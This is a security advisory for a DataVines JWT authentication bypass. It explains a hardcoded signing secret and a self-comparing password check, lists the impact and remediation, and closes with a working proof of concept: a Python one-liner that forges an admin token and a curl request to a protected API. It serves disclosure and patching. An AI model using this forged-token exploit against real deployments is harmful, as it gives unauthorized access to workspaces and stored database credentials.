# Vulnerability Summary: DataVines JWT Authentication Bypass ## Overview DataVines has a critical JWT authentication bypass vulnerability caused by two combined flaws: 1. **Hardcoded Secret**: The JWT signing key is hardcoded in the code as the default value `asdqwe`, and it is not provided in the configuration file (`application.yaml`), causing all default deployments to use the same key. 2. **Self-Comparison Logic**: In the `validateToken` method, the code compares the extracted password with itself (`tokenPassword.equals(tokenPassword2)`), causing the validation logic to always return `true`. ## Impact Scope An attacker only needs to know a valid username (e.g., the default `admin`) to forge a JWT token and completely bypass the authentication mechanism. * Access all protected API endpoints. * List all workspace and data source configurations (including database credentials). * Perform arbitrary actions under the impersonated user’s identity. * Access administrator-only features. * **No valid password or user account required.** ## Remediation * Refer to Pull Request #579. * Remove the hardcoded secret and use the key from the configuration file. * Fix the logic in `validateToken` to ensure the password validation works correctly. ## POC Code ```python # Generate a forged token using the known secret "asdqwe" and any fake password python3 -c " import jwt, time token = jwt.encode({ 'un': 'admin', 'up': 'FAKE_PASSWORD', 'ct': int(time.time()*1000), 'sub': 'admin', 'exp': int(time.time()) + 315360000 }, 'asdqwe', algorithm='HS256') print(token) " # Use the forged token to access protected API curl -s http://TARGET:9600/api/xd/workspace/list \ -H "Authorization: Bearer " # Returns HTTP 200 with workspace data - authentication bypassed ```